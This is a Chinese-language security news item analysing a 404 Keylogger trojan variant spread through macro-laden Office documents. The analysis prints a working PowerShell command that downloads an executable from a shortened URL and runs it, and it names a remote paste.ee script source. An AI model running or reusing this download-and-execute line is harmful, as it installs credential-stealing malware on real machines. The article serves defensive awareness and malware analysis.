安全動態(tài)

404 Keylogger最新木馬,盜取受害者瀏覽器網(wǎng)站帳號和密碼

來源:聚銘網(wǎng)絡(luò)    發(fā)布時間:2019-12-29    瀏覽次數(shù):
 

信息來源:FreeBuf

近日,研究人員捕獲到一個最新的404 Keylogger木馬變種,通過OFFICE文檔嵌入惡意宏代碼進(jìn)行傳播,盜取受害者瀏覽器的網(wǎng)站帳號和密碼,深信服安全團(tuán)隊對此樣本進(jìn)行了詳細(xì)分析,并獲取到了黑客FTP服務(wù)器的帳號和密碼,請大家提高安全意識,不要輕易打開未知的郵件附件及文檔等。

樣本是一個RTF文檔,里面嵌套了OLE對象,包含惡意宏代碼,如下所示:

惡意宏代碼,會啟動PowerShell進(jìn)程,從遠(yuǎn)程服務(wù)器上下載惡意程序,然后執(zhí)行,相關(guān)參數(shù),如下:

powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/2P7EoT7 ” , ”$ENv:teMp\4235.exe” ) ; stARt ”$ENv:tEMP\4235.exe”

分析下載的惡意程序,使用NET語言進(jìn)行開發(fā),首先會獲取遠(yuǎn)程服務(wù)器地址:hxxps://paste.ee/r/RrkBF,如下所示:

讀取遠(yuǎn)程服務(wù)器上的內(nèi)容,如下所示:

直接加載執(zhí)行遠(yuǎn)程服務(wù)器上的腳本,如下所示:

解密去混淆遠(yuǎn)程服務(wù)器上的腳本之后,同樣是一個NET編寫的程序,如下所示:

該程序主要功能是鍵盤記錄,盜取受害者瀏覽器網(wǎng)站上的帳號和密碼,會結(jié)束受害者主機(jī)上的瀏覽器相關(guān)進(jìn)程,如下所示:

對抗殺軟,結(jié)束相關(guān)安全軟件進(jìn)程,相關(guān)的安全軟件進(jìn)程有一百多個,如下所示:

將記錄的瀏覽器上網(wǎng)站,以及相關(guān)的帳號和密碼,然后發(fā)送到黑客遠(yuǎn)程FTPd服務(wù)器,如下所示:

該惡意程序還有截屏等操作,在分析該惡意程序的時候發(fā)現(xiàn)了黑客的FTP服務(wù)器地址,以及帳號和密碼,登錄進(jìn)去,發(fā)現(xiàn)它已經(jīng)盜取了部分受害者的主機(jī)信息,如下所示:

 
 

上一篇:早期黑客行動“KGB Hack” 已發(fā)生三十周年

下一篇:Maastricht大學(xué)遭勒索軟件襲擊,所有系統(tǒng)均癱瘓